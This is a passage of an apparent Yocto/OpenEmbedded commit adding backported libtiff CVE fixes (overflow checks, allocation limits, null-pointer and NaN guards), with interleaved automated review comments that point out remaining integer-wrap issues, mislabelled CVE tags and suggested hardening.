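+ CopyField(TIFFTAG_DOCUMENTNAME, stringv);
+
++ if (maxMalloc != 0 && TIFFStripSize(in) > maxMalloc)
++ {
++ TIFFError(TIFFFileName(in),
++ "Strip Size " TIFF_UINT64_FORMAT " over memory limit (" TIFF_UINT64_FORMAT ")",
++ (uint64)TIFFStripSize(in), (uint64)maxMalloc);
++ return 0;
++ }
+ if( process_by_block && TIFFIsTiled( in ) )
+ return( cvt_by_tile( in, out ) );
+ else if( process_by_block )
+@@ -539,7 +559,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ }
+
+ static const char* stuff[] = {
+- "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
++ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] [-M size] input... output",
+ "where comp is one of the following compression algorithms:",
+ " jpeg\t\tJPEG encoding",
+ " zip\t\tZip/Deflate encoding",
+@@ -551,6 +571,7 @@ static const char* stuff[] = {
+ " -b (progress by block rather than as a whole image)",
+ " -n don't emit alpha component.",
+ " -8 write BigTIFF file instead of ClassicTIFF",
++ " -M set the memory allocation limit in MiB. 0 to disable limit",
+ NULL
+ };
+
+--
+GitLab
+
+
+From e9e504193ef1f87e9cb5e986586b0cbe3254e421 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sun, 15 Nov 2020 17:08:42 +0100
+Subject: [PATCH 2/2] tiff2rgba.1: -M option
+
+---
+ man/tiff2rgba.1 | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/man/tiff2rgba.1 b/man/tiff2rgba.1
+index d9c9baae..fe9ebb2c 100644
+--- a/man/tiff2rgba.1
++++ b/man/tiff2rgba.1
+@@ -87,6 +87,10 @@ Drop the alpha component from the output file, producing a pure RGB file.
+ Currently this does not work if the
+ .B \-b
+ flag is also in effect.
++.TP
++.BI \-M " size"
++Set maximum memory allocation size (in MiB). The default is 256MiB.
++Set to 0 to disable the limit.
+ .SH "SEE ALSO"
+ .BR tiff2bw (1),
+ .BR TIFFReadRGBAImage (3t),
+--
+GitLab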
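Review bot: The `-M` handler `maxMalloc = (tmsize_t)strtoul(optarg, NULL, 0) << 20;` does no validation, so a non-numeric argument parses as 0, which the added comment defines as "limit disabled", and a large value can wrap or turn negative in the shift. The allocation limit that this CVE fix introduces can therefore be switched off or distorted by a malformed argument without any diagnostic. Parsing with an end pointer and rejecting values that do not fit after the shift keeps the limit meaningful; the sketch below assumes `TIFF_TMSIZE_T_MAX` from tiffiop.h is available in the libtiff version this recipe builds. Separately, the `From` line names commit 98a254f5… while `Upstream-Status` points at b5a935d9…, so one of the two should be corrected to keep the backport traceable. main() continues outside the hunk.

```c
        case 'M': {
            char *end = NULL;
            unsigned long mib = strtoul(optarg, &end, 0);
            /* reject empty or non-numeric input, and values whose byte
             * count would not fit in tmsize_t after the shift */
            if (end == optarg || *end != '\0' ||
                (uint64)mib > ((uint64)TIFF_TMSIZE_T_MAX >> 20))
                usage(EXIT_FAILURE);
            maxMalloc = (tmsize_t)mib << 20;
            break;
        }
        /* … unchanged: remaining option cases … */
```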
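--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch
@@ -0,0 +1,55 @@
+From c8d613ef497058fe653c467fc84c70a62a4a71b2 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 01:54:30 +0100
+Subject: [PATCH] gtTileContig(): check Tile width for overflow
+
+fixes #211
+
+Upstream-Status: Backport [ https://gitlab.com/libtiff/libtiff/-/commit/c8d613ef497058fe653c467fc84c70a62a4a71b2 ]
+CVE: CVE-2020-35523
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ libtiff/tif_getimage.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/libtiff/tif_getimage.c b/libtiff/tif_getimage.c
+index 4da785d3..96ab1460 100644
+--- a/libtiff/tif_getimage.c
++++ b/libtiff/tif_getimage.c
+@@ -29,6 +29,7 @@
+ */
+ #include "tiffiop.h"
+ #include <stdio.h>
++#include <limits.h>
+
+ static int gtTileContig(TIFFRGBAImage*, uint32*, uint32, uint32);
+ static int gtTileSeparate(TIFFRGBAImage*, uint32*, uint32, uint32);
+@@ -645,12 +646,20 @@ gtTileContig(TIFFRGBAImage* img, uint32* raster, uint32 w, uint32 h)
+
+ flip = setorientation(img);
+ if (flip & FLIP_VERTICALLY) {
+- y = h - 1;
+- toskew = -(int32)(tw + w);
++ if ((tw + w) > INT_MAX) {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif), "%s", "unsupported tile size (too wide)");
++ return (0);
++ }
++ y = h - 1;
++ toskew = -(int32)(tw + w);
+ }
+ else {
+- y = 0;
+- toskew = -(int32)(tw - w);
++ if (tw > (INT_MAX + w)) {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif), "%s", "unsupported tile size (too wide)");
++ return (0);
++ }
++ y = 0;
++ toskew = -(int32)(tw - w);
+ }
+
+ /*
+--
+GitLab
+
+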
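Review bot: Both added range checks in gtTileContig() are evaluated in 32-bit unsigned arithmetic, so they do not reliably test what they intend. In `if ((tw + w) > INT_MAX)` the sum wraps before the comparison and an oversized pair can pass, and in `if (tw > (INT_MAX + w))` the right-hand side wraps for `w` above 2^31, which makes the check reject sizes it should accept. `w` is `uint32` per the signature in the hunk header; `tw` is declared outside the hunk and is presumably also `uint32`. Widening before the arithmetic closes the gap: `if ((uint64)tw + w > INT_MAX)` and `if ((uint64)tw > (uint64)INT_MAX + w)`. The backport matches the upstream commit as shown, so the change is best raised upstream as well.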
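--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch
@@ -0,0 +1,42 @@
+From c6a12721b46f1a72974f91177890301730d7b330 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 01:01:59 +0100
+Subject: [PATCH] tiff2pdf.c: properly calculate datasize when saving to JPEG
+ YCbCr
+
+fixes #220
+Upstream-Status: Backport
+https://gitlab.com/libtiff/libtiff/-/commit/c6a12721b46f1a72974f91177890301730d7b330
+https://gitlab.com/libtiff/libtiff/-/merge_requests/159/commits
+CVE: CVE-2021-35524
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ tools/tiff2pdf.c | 11 ++++++++---
+ 1 file changed, 8 insertions(+), 3 deletions(-)
+
+diff --git a/tools/tiff2pdf.c b/tools/tiff2pdf.c
+index 719811ea..dc69d2f9 100644
+--- a/tools/tiff2pdf.c
++++ b/tools/tiff2pdf.c
+@@ -2087,9 +2087,14 @@ void t2p_read_tiff_size(T2P* t2p, TIFF* input){
+ #endif
+ (void) 0;
+ }
+- k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
+- if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
+- k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
++ if(t2p->pdf_compression == T2P_COMPRESS_JPEG
++ && t2p->tiff_photometric == PHOTOMETRIC_YCBCR) {
++ k = checkMultiply64(TIFFNumberOfStrips(input), TIFFStripSize(input), t2p);
++ } else {
++ k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
++ if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
++ k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
++ }
+ }
+ if (k == 0) {
+ /* Assume we had overflow inside TIFFScanlineSize */
+--
+GitLab
+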
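Review bot: The tag `CVE: CVE-2021-35524` does not match the file name CVE-2020-35524-1.patch, and CVE-2020-35524-2.patch carries the same tag. If the year is a typo, CVE tracking that reads the `CVE:` line will record the wrong identifier as patched, so the tag should read `CVE: CVE-2020-35524` in both files. `Upstream-Status: Backport` is also followed by bare URLs on separate lines, where the other patches in this commit use `Upstream-Status: Backport [URL]`; putting the commit URL in brackets on the same line keeps the header consistent. t2p_read_tiff_size() extends beyond the hunk.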
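--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch
@@ -0,0 +1,36 @@
+From d74f56e3b7ea55c8a18a03bc247cd5fd0ca288b2 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Tue, 10 Nov 2020 02:05:05 +0100
+Subject: [PATCH] Fix for building without JPEG support
+
+Upstream-Status: Backport
+https://gitlab.com/libtiff/libtiff/-/commit/d74f56e3b7ea55c8a18a03bc247cd5fd0ca288b2
+https://gitlab.com/libtiff/libtiff/-/merge_requests/159/commits
+CVE: CVE-2021-35524
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiff2pdf.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiff2pdf.c b/tools/tiff2pdf.c
+index dc69d2f9..d0b0ede7 100644
+--- a/tools/tiff2pdf.c
++++ b/tools/tiff2pdf.c
+@@ -2087,10 +2087,13 @@ void t2p_read_tiff_size(T2P* t2p, TIFF* input){
+ #endif
+ (void) 0;
+ }
++#ifdef JPEG_SUPPORT
+ if(t2p->pdf_compression == T2P_COMPRESS_JPEG
+ && t2p->tiff_photometric == PHOTOMETRIC_YCBCR) {
+ k = checkMultiply64(TIFFNumberOfStrips(input), TIFFStripSize(input), t2p);
+- } else {
++ } else
++#endif
++ {
+ k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
+ if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
+ k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
+--
+GitLab
+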
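--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch
@@ -0,0 +1,39 @@
+From a1c933dabd0e1c54a412f3f84ae0aa58115c6067 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Thu, 24 Feb 2022 22:26:02 +0100
+Subject: [PATCH] tif_jbig.c: fix crash when reading a file with multiple IFD
+ in memory-mapped mode and when bit reversal is needed (fixes #385)
+
+CVE: CVE-2022-0865
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0865.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_jbig.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/libtiff/tif_jbig.c b/libtiff/tif_jbig.c
+index 74086338..8bfa4cef 100644
+--- a/libtiff/tif_jbig.c
++++ b/libtiff/tif_jbig.c
+@@ -208,6 +208,16 @@ int TIFFInitJBIG(TIFF* tif, int scheme)
+ */
+ tif->tif_flags |= TIFF_NOBITREV;
+ tif->tif_flags &= ~TIFF_MAPPED;
++ /* We may have read from a previous IFD and thus set TIFF_BUFFERMMAP and
++ * cleared TIFF_MYBUFFER. It is necessary to restore them to their initial
++ * value to be consistent with the state of a non-memory mapped file.
++ */
++ if (tif->tif_flags&TIFF_BUFFERMMAP) {
++ tif->tif_rawdata = NULL;
++ tif->tif_rawdatasize = 0;
++ tif->tif_flags &= ~TIFF_BUFFERMMAP;
++ tif->tif_flags |= TIFF_MYBUFFER;
++ }
+
+ /* Setup the function pointers for encode, decode, and cleanup. */
+ tif->tif_setupdecode = JBIGSetupDecode;
+--
+GitLab
+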
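--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch
@@ -0,0 +1,217 @@
+From 232282fd8f9c21eefe8d2d2b96cdbbb172fe7b7c Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 8 Mar 2022 17:02:44 +0000
+Subject: [PATCH] tiffcrop: fix issue #380 and #382 heap buffer overflow in
+ extractImageSection
+
+CVE: CVE-2022-0891
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0891.patch/]
+Comment: No change in any hunk
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+---
+ tools/tiffcrop.c | 92 +++++++++++++++++++-----------------------------
+ 1 file changed, 36 insertions(+), 56 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f2e5474a..e62bcc71 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -105,8 +105,8 @@
+ * of messages to monitor progess without enabling dump logs.
+ */
+
+-static char tiffcrop_version_id[] = "2.4";
+-static char tiffcrop_rev_date[] = "12-13-2010";
++static char tiffcrop_version_id[] = "2.4.1";
++static char tiffcrop_rev_date[] = "03-03-2010";
+
+ #include "tif_config.h"
+ #include "tiffiop.h"
+@@ -6670,10 +6670,10 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+ uint32 img_length;
+ #endif
+- uint32 j, shift1, shift2, trailing_bits;
++ uint32 j, shift1, trailing_bits;
+ uint32 row, first_row, last_row, first_col, last_col;
+ uint32 src_offset, dst_offset, row_offset, col_offset;
+- uint32 offset1, offset2, full_bytes;
++ uint32 offset1, full_bytes;
+ uint32 sect_width;
+ #ifdef DEVELMODE
+ uint32 sect_length;
+@@ -6683,7 +6683,6 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+ int k;
+ unsigned char bitset;
+- static char *bitarray = NULL;
+ #endif
+
+ img_width = image->width;
+@@ -6701,17 +6700,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ dst_offset = 0;
+
+ #ifdef DEVELMODE
+- if (bitarray == NULL)
+- {
+- if ((bitarray = (char *)malloc(img_width)) == NULL)
+- {
+- TIFFError ("", "DEBUG: Unable to allocate debugging bitarray");
+- return (-1);
+- }
+- }
++ char bitarray[39];
+ #endif
+
+- /* rows, columns, width, length are expressed in pixels */
++ /* rows, columns, width, length are expressed in pixels
++ * first_row, last_row, .. are index into image array starting at 0 to width-1,
++ * last_col shall be also extracted. */
+ first_row = section->y1;
+ last_row = section->y2;
+ first_col = section->x1;
+@@ -6721,9 +6715,14 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #ifdef DEVELMODE
+ sect_length = last_row - first_row + 1;
+ #endif
+- img_rowsize = ((img_width * bps + 7) / 8) * spp;
+- full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
+- trailing_bits = (sect_width * bps) % 8;
++ /* The read function loadImage() used copy separate plane data into a buffer as interleaved
++ * samples rather than separate planes so the same logic works to extract regions
++ * regardless of the way the data are organized in the input file.
++ * Furthermore, bytes and bits are arranged in buffer according to COMPRESSION=1 and FILLORDER=1
++ */
++ img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
++ full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
++ trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
+
+ #ifdef DEVELMODE
+ TIFFError ("", "First row: %d, last row: %d, First col: %d, last col: %d\n",
+@@ -6736,10 +6735,9 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+
+ if ((bps % 8) == 0)
+ {
+- col_offset = first_col * spp * bps / 8;
++ col_offset = (first_col * spp * bps) / 8;
+ for (row = first_row; row <= last_row; row++)
+ {
+- /* row_offset = row * img_width * spp * bps / 8; */
+ row_offset = row * img_rowsize;
+ src_offset = row_offset + col_offset;
+
+@@ -6752,14 +6750,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ }
+ else
+ { /* bps != 8 */
+- shift1 = spp * ((first_col * bps) % 8);
+- shift2 = spp * ((last_col * bps) % 8);
++ shift1 = ((first_col * spp * bps) % 8); /* shift1 = bits to skip in the first byte of source buffer*/
+ for (row = first_row; row <= last_row; row++)
+ {
+ /* pull out the first byte */
+ row_offset = row * img_rowsize;
+- offset1 = row_offset + (first_col * bps / 8);
+- offset2 = row_offset + (last_col * bps / 8);
++ offset1 = row_offset + ((first_col * spp * bps) / 8); /* offset1 = offset into source of byte with first bits to be extracted */
+
+ #ifdef DEVELMODE
+ for (j = 0, k = 7; j < 8; j++, k--)
+@@ -6771,12 +6767,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ sprintf(&bitarray[9], " ");
+ for (j = 10, k = 7; j < 18; j++, k--)
+ {
+- bitset = *(src_buff + offset2) & (((unsigned char)1 << k)) ? 1 : 0;
++ bitset = *(src_buff + offset1 + full_bytes) & (((unsigned char)1 << k)) ? 1 : 0;
+ sprintf(&bitarray[j], (bitset) ? "1" : "0");
+ }
+ bitarray[18] = '\0';
+- TIFFError ("", "Row: %3d Offset1: %d, Shift1: %d, Offset2: %d, Shift2: %d\n",
+- row, offset1, shift1, offset2, shift2);
++ TIFFError ("", "Row: %3d Offset1: %"PRIu32", Shift1: %"PRIu32", Offset2: %"PRIu32", Trailing_bits: %"PRIu32"\n",
++ row, offset1, shift1, offset1+full_bytes, trailing_bits);
+ #endif
+
+ bytebuff1 = bytebuff2 = 0;
+@@ -6800,11 +6796,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+
+ if (trailing_bits != 0)
+ {
+- bytebuff2 = src_buff[offset2] & ((unsigned char)255 << (7 - shift2));
++ /* Only copy higher bits of samples and mask lower bits of not wanted column samples to zero */
++ bytebuff2 = src_buff[offset1 + full_bytes] & ((unsigned char)255 << (8 - trailing_bits));
+ sect_buff[dst_offset] = bytebuff2;
+ #ifdef DEVELMODE
+ TIFFError ("", " Trailing bits src offset: %8d, Dst offset: %8d\n",
+- offset2, dst_offset);
++ offset1 + full_bytes, dst_offset);
+ for (j = 30, k = 7; j < 38; j++, k--)
+ {
+ bitset = *(sect_buff + dst_offset) & (((unsigned char)1 << k)) ? 1 : 0;
+@@ -6823,8 +6820,10 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #endif
+ for (j = 0; j <= full_bytes; j++)
+ {
+- bytebuff1 = src_buff[offset1 + j] & ((unsigned char)255 >> shift1);
+- bytebuff2 = src_buff[offset1 + j + 1] & ((unsigned char)255 << (7 - shift1));
++ /* Skip the first shift1 bits and shift the source up by shift1 bits before save to destination.*/
++ /* Attention: src_buff size needs to be some bytes larger than image size, because could read behind image here. */
++ bytebuff1 = src_buff[offset1 + j] & ((unsigned char)255 >> shift1);
++ bytebuff2 = src_buff[offset1 + j + 1] & ((unsigned char)255 << (8 - shift1));
+ sect_buff[dst_offset + j] = (bytebuff1 << shift1) | (bytebuff2 >> (8 - shift1));
+ }
+ #ifdef DEVELMODE
+@@ -6840,36 +6839,17 @@ extractImageSection(struct image_data *image, struct pageseg *section,
+ #endif
+ dst_offset += full_bytes;
+
++ /* Copy the trailing_bits for the last byte in the destination buffer.
++ Could come from one ore two bytes of the source buffer. */
+ if (trailing_bits != 0)
+ {
+ #ifdef DEVELMODE
+- TIFFError ("", " Trailing bits src offset: %8d, Dst offset: %8d\n", offset1 + full_bytes, dst_offset);
+-#endif
+- if (shift2 > shift1)
+- {
+- bytebuff1 = src_buff[offset1 + full_bytes] & ((unsigned char)255 << (7 - shift2));
+- bytebuff2 = bytebuff1 & ((unsigned char)255 << shift1);
+- sect_buff[dst_offset] = bytebuff2;
+-#ifdef DEVELMODE
+- TIFFError ("", " Shift2 > Shift1\n");
++ TIFFError("", " Trailing bits %4"PRIu32" src offset: %8"PRIu32", Dst offset: %8"PRIu32"\n", trailing_bits, offset1 + full_bytes, dst_offset);
+ #endif
++ /* More than necessary bits are already copied into last destination buffer,
++ * only masking of last byte in destination buffer is necessary.*/
++ sect_buff[dst_offset] &= ((uint8_t)0xFF << (8 - trailing_bits));
+ }
+- else
+- {
+- if (shift2 < shift1)
+- {
+- bytebuff2 = ((unsigned char)255 << (shift1 - shift2 - 1));
+- sect_buff[dst_offset] &= bytebuff2;
+-#ifdef DEVELMODE
+- TIFFError ("", " Shift2 < Shift1\n");
+-#endif
+- }
+-#ifdef DEVELMODE
+- else
+- TIFFError ("", " Shift2 == Shift1\n");
+-#endif
+- }
+- }
+ #ifdef DEVELMODE
+ sprintf(&bitarray[28], " ");
+ sprintf(&bitarray[29], " ");
+@@ -7022,7 +7002,7 @@ writeImageSections(TIFF *in, TIFF *out, struct image_data *image,
+ width = sections[i].x2 - sections[i].x1 + 1;
+ length = sections[i].y2 - sections[i].y1 + 1;
+ sectsize = (uint32)
+- ceil((width * image->bps + 7) / (double)8) * image->spp * length;
++ ceil((width * image->bps * image->spp + 7) / (double)8) * length;
+ /* allocate a buffer if we don't have one already */
+ if (createImageSection(sectsize, sect_buff_ptr))
+ {
+--
+GitLab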
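Review bot: The unaligned copy loop `for (j = 0; j <= full_bytes; j++)` in extractImageSection() still reads `src_buff[offset1 + j + 1]`, which reaches past the last byte the section needs, and the added comment only states that src_buff must be allocated larger than the image. That allocation is outside this hunk, so it should be confirmed that loadImage() in the libtiff version this recipe builds really pads its read buffer; otherwise the last row can still read beyond it. The new code also uses `uint8_t` (and `PRIu32` under DEVELMODE) while the header says `Comment: No change in any hunk`; the tiffset backport in this same commit had to add `#include <stdint.h>` by hand, so it is worth checking that tiffcrop.c already pulls in those definitions. A header line such as `Comment: relies on loadImage() over-allocating the read buffer (checked against the recipe's source)` would record the result of the first check.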
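--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch
@@ -0,0 +1,94 @@
+From 40b00cfb32256d377608b4d4cd30fac338d0a0bc Mon Sep 17 00:00:00 2001
+From: Augustus <wangdw.augustus@qq.com>
+Date: Mon, 7 Mar 2022 18:21:49 +0800
+Subject: [PATCH] add checks for return value of limitMalloc (#392)
+
+CVE: CVE-2022-0907
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0907.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ tools/tiffcrop.c | 33 +++++++++++++++++++++------------
+ 1 file changed, 21 insertions(+), 12 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f2e5474a..9b8acc7e 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7337,7 +7337,11 @@ createImageSection(uint32_t sectsize, unsigned char **sect_buff_ptr)
+ if (!sect_buff)
+ {
+ sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
+- *sect_buff_ptr = sect_buff;
++ if (!sect_buff)
++ {
++ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
++ return (-1);
++ }
+ _TIFFmemset(sect_buff, 0, sectsize);
+ }
+ else
+@@ -7353,15 +7357,15 @@ createImageSection(uint32_t sectsize, unsigned char **sect_buff_ptr)
+ else
+ sect_buff = new_buff;
+
++ if (!sect_buff)
++ {
++ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
++ return (-1);
++ }
+ _TIFFmemset(sect_buff, 0, sectsize);
+ }
+ }
+
+- if (!sect_buff)
+- {
+- TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+- return (-1);
+- }
+ prev_sectsize = sectsize;
+ *sect_buff_ptr = sect_buff;
+
+@@ -7628,7 +7632,11 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ if (!crop_buff)
+ {
+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
+- *crop_buff_ptr = crop_buff;
++ if (!crop_buff)
++ {
++ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
++ return (-1);
++ }
+ _TIFFmemset(crop_buff, 0, cropsize);
+ prev_cropsize = cropsize;
+ }
+@@ -7644,15 +7652,15 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ }
+ else
+ crop_buff = new_buff;
++ if (!crop_buff)
++ {
++ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
++ return (-1);
++ }
+ _TIFFmemset(crop_buff, 0, cropsize);
+ }
+ }
+
+- if (!crop_buff)
+- {
+- TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
+- return (-1);
+- }
+ *crop_buff_ptr = crop_buff;
+
+ if (crop->crop_mode & CROP_INVERT)
+@@ -9211,3 +9219,4 @@ invertImage(uint16_t photometric, uint16_t spp, uint16_t bps, uint32_t width, ui
+ * fill-column: 78
+ * End:
+ */
++
+--
+GitLab
+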
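Review bot: The failure return added in the reallocation branch of createImageSection() exits with `return (-1);` before `*sect_buff_ptr = sect_buff;` is reached, so the caller's pointer keeps its previous value. The lines before `else sect_buff = new_buff;` are outside the hunk; if they release the old buffer when the reallocation fails, as the surrounding shape suggests, `*sect_buff_ptr` would then refer to freed memory. Adding `*sect_buff_ptr = NULL;` before that `return (-1);` avoids this, and the same applies to `*crop_buff_ptr` in createCroppedImage(). The last hunk only appends a blank line at the end of tiffcrop.c and could be dropped from the backport.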
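diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch
new file mode 100644
index 0000000000..e65af6c600
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch
@@ -0,0 +1,34 @@
+From a95b799f65064e4ba2e2dfc206808f86faf93e85 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Thu, 17 Feb 2022 15:28:43 +0100
+Subject: [PATCH] TIFFFetchNormalTag(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #383)
+
+CVE: CVE-2022-0908
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0908.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_dirread.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 50ebf8ac..2ec44a4f 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -5021,7 +5021,10 @@ TIFFFetchNormalTag(TIFF* tif, TIFFDirEntry* dp, int recover)
+ _TIFFfree(data);
+ return(0);
+ }
+- _TIFFmemcpy(o,data,(uint32)dp->tdir_count);
++ if (dp->tdir_count > 0 )
++ {
++ _TIFFmemcpy(o,data,(uint32)dp->tdir_count);
++ }
+ o[(uint32)dp->tdir_count]=0;
+ if (data!=0)
+ _TIFFfree(data);
+--
+GitLab
+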
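Review bot: The new `if (dp->tdir_count > 0 )` guard around `_TIFFmemcpy` carries no comment saying why a zero-length copy is skipped, so a later clean-up could fold it away again. I would put `/* memcpy() with a NULL source is undefined even when the length is 0 */` directly above the guard and drop the stray space before the closing parenthesis. The terminator write `o[(uint32)dp->tdir_count]=0;` stays unconditional, which is safe only if `o` was allocated with room for `tdir_count + 1` bytes; that allocation is outside the hunk and should be confirmed whenever this backport is rebased. TIFFFetchNormalTag starts and ends outside the hunk.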
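diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch
new file mode 100644
index 0000000000..d487f1bd95
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch
@@ -0,0 +1,37 @@
+From 32ea0722ee68f503b7a3f9b2d557acb293fc8cde Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Tue, 8 Mar 2022 16:22:04 +0000
+Subject: [PATCH] fix the FPE in tiffcrop (#393)
+
+CVE: CVE-2022-0909
+Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0909.patch/]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: No change in any hunk
+
+---
+ libtiff/tif_dir.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 57055ca9..59b346ca 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -334,13 +334,13 @@ _TIFFVSetField(TIFF* tif, uint32_t tag, va_list ap)
+ break;
+ case TIFFTAG_XRESOLUTION:
+ dblval = va_arg(ap, double);
+- if( dblval < 0 )
++ if( dblval != dblval || dblval < 0 )
+ goto badvaluedouble;
+ td->td_xresolution = _TIFFClampDoubleToFloat( dblval );
+ break;
+ case TIFFTAG_YRESOLUTION:
+ dblval = va_arg(ap, double);
+- if( dblval < 0 )
++ if( dblval != dblval || dblval < 0 )
+ goto badvaluedouble;
+ td->td_yresolution = _TIFFClampDoubleToFloat( dblval );
+ break;
+--
+GitLab
+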
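Review bot: The NaN rejection is written as the bare self-comparison `dblval != dblval` in both the TIFFTAG_XRESOLUTION and TIFFTAG_YRESOLUTION cases, with nothing to tell a reader that this is a NaN test rather than a typo. I would add `/* dblval != dblval is true only for NaN */` above each test, and note in the same comment that the check relies on IEEE semantics, since a build with `-ffinite-math-only` is permitted to fold it to false. A resolution of exactly 0 still passes `dblval < 0`, so any consumer that divides by the stored resolution needs its own guard; none is visible in this hunk. _TIFFVSetField continues outside the hunk.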
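diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch
new file mode 100644
index 0000000000..ddb035c972
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch
@@ -0,0 +1,58 @@
+From 88d79a45a31c74cba98c697892fed5f7db8b963a Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
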